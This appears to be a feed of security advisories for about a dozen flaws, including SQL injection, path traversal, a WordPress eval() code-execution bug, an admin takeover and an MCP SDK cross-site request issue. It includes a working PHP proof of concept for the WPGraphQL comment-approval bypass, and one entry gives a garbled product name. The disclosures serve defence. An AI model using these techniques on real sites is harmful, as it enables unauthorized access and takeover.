Vulnerabilities

Heap buffer overflow in WebAudio in Google Chrome prior to 146.0.7680.165 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)

Dasel is a command-line tool and library for querying, modifying, and transforming data structures. Starting in version 3.0.0 and prior to version 3.3.1, Dasel's YAML reader allows an attacker who can supply YAML for processing to trigger extreme CPU and memory consumption. The issue is in the library's own `UnmarshalYAML` implementation, which manually resolves alias nodes by recursively following `yaml.Node.Alias` pointers without any expansion budget, bypassing go-yaml v4's built-in alias expansion limit. Version 3.3.2 contains a patch for the issue.

WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.<br /> <br /> ### Details<br /> <br /> In WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:<br /> <br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.<br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.<br /> - plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.<br /> - plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.<br /> - plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).<br /> <br /> This means a non-moderator owner can submit status during update and transition moderation state.<br /> <br /> ### PoC<br /> <br /> Tested in local wp-env (Docker) with WPGraphQL 2.9.1.<br /> <br /> 1. Start environment:<br /> <br /> npm install<br /> npm run wp-env start<br /> <br /> 2. Run this PoC:<br /> <br /> ```<br /> npm run wp-env run cli -- wp eval &amp;#39;<br /> add_role("no_caps","No Caps",[]);<br /> $user_id = username_exists("poc_nocaps");<br /> if ( ! $user_id ) {<br /> $user_id = wp_create_user("poc_nocaps","Passw0rd!","poc_nocaps@example.com");<br /> }<br /> $user = get_user_by("id",$user_id);<br /> $user-&gt;set_role("no_caps");<br /> <br /> $post_id = wp_insert_post([<br /> "post_title" =&gt; "PoC post",<br /> "post_status" =&gt; "publish",<br /> "post_type" =&gt; "post",<br /> "comment_status" =&gt; "open",<br /> ]);<br /> <br /> $comment_id = wp_insert_comment([<br /> "comment_post_ID" =&gt; $post_id,<br /> "comment_content" =&gt; "pending comment",<br /> "user_id" =&gt; $user_id,<br /> "comment_author" =&gt; $user-&gt;display_name,<br /> "comment_author_email" =&gt; $user-&gt;user_email,<br /> "comment_approved" =&gt; "0",<br /> ]);<br /> <br /> wp_set_current_user($user_id);<br /> <br /> $result = graphql([<br /> "query" =&gt; "mutation U(\$id:ID!){ updateComment(input:{id:\$id,status:APPROVE}){ success comment{ databaseId status } } }",<br /> "variables" =&gt; [ "id" =&gt; (string)$comment_id ],<br /> ]);<br /> <br /> echo wp_json_encode([<br /> "role_caps" =&gt; array_keys(array_filter((array)$user-&gt;allcaps)),<br /> "status" =&gt; $result["data"]["updateComment"]["comment"]["status"] ?? null,<br /> "db_comment_approved" =&gt; get_comment($comment_id)-&gt;comment_approved ?? null,<br /> "comment_id" =&gt; $comment_id<br /> ]);<br /> &amp;#39;<br /> ```<br /> <br /> 3. Observe result:<br /> <br /> - role_caps is empty (or no moderate_comments)<br /> - mutation returns status: APPROVE<br /> - DB value becomes comment_approved = 1<br /> <br /> ### Impact<br /> <br /> This is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content.

llama.cpp is an inference of several LLM models in C/C++. Prior to b7824, an integer overflow vulnerability in the `ggml_nbytes` function allows an attacker to bypass memory validation by crafting a GGUF file with specific tensor dimensions. This causes `ggml_nbytes` to return a significantly smaller size than required (e.g., 4MB instead of Exabytes), leading to a heap-based buffer overflow when the application subsequently processes the tensor. This vulnerability allows potential Remote Code Execution (RCE) via memory corruption. b7824 contains a fix.

Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories.This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2.

A vulnerability was identified in SourceCodester Online Catering Reservation 1.0. Impacted is an unknown function of the file /search.php. Such manipulation of the argument rcode leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used.

The Woocommerce Custom Product Addons Pro plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 5.4.1 via the custom pricing formula eval() in the process_custom_formula() function within includes/process/price.php. This is due to insufficient sanitization and validation of user-submitted field values before passing them to PHP&amp;#39;s eval() function. The sanitize_values() method strips HTML tags but does not escape single quotes or prevent PHP code injection. This makes it possible for unauthenticated attackers to execute arbitrary code on the server by submitting a crafted value to a WCPA text field configured with custom pricing formula (pricingType: "custom" with {this.value}).

The Contest Gallery plugin for WordPress is vulnerable to an authentication bypass leading to admin account takeover in all versions up to, and including, 28.1.5. This is due to the email confirmation handler in `users-registry-check-after-email-or-pin-confirmation.php` using the user&amp;#39;s email string in a `WHERE ID = %s` clause instead of the numeric user ID, combined with an unauthenticated key-based login endpoint in `ajax-functions-frontend.php`. When the non-default `RegMailOptional=1` setting is enabled, an attacker can register with a crafted email starting with the target user ID (e.g., `1poc@example.test`), trigger the confirmation flow to overwrite the admin&amp;#39;s `user_activation_key` via MySQL integer coercion, and then use the `post_cg1l_login_user_by_key` AJAX action to authenticate as the admin without any credentials. This makes it possible for unauthenticated attackers to take over any WordPress administrator account and gain full site control.

The User Registration &amp; Membership plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Content Access Rules REST API endpoints in versions 5.0.1 through 5.1.4. This is due to the `check_permissions()` method only checking for `edit_posts` capability instead of an administrator-level capability. This makes it possible for authenticated attackers, with Contributor-level access and above, to list, create, modify, toggle, duplicate, and delete site-wide content restriction rules, potentially exposing restricted content or denying legitimate user access.

A vulnerability was found in SourceCodester E-Commerce Site 1.0. This vulnerability affects unknown code of the file /products.php. The manipulation of the argument Search results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used.

A vulnerability was determined in itsourcecode sanitize or validate this input 1.0. This issue affects some unknown processing of the file /admin/subjects.php of the component Parameter Handler. This manipulation of the argument subject_code causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.

The Go MCP SDK used Go&amp;#39;s standard encoding/json. Prior to version 1.4.1, the Go SDK&amp;#39;s Streamable HTTP transport accepted browser-generated cross-site `POST` requests without validating the `Origin` header and without requiring `Content-Type: application/json`. In deployments without Authorization, especially stateless or sessionless configurations, this allows an arbitrary website to send MCP requests to a local server and potentially trigger tool execution. Version 1.4.1 contains a patch for the issue.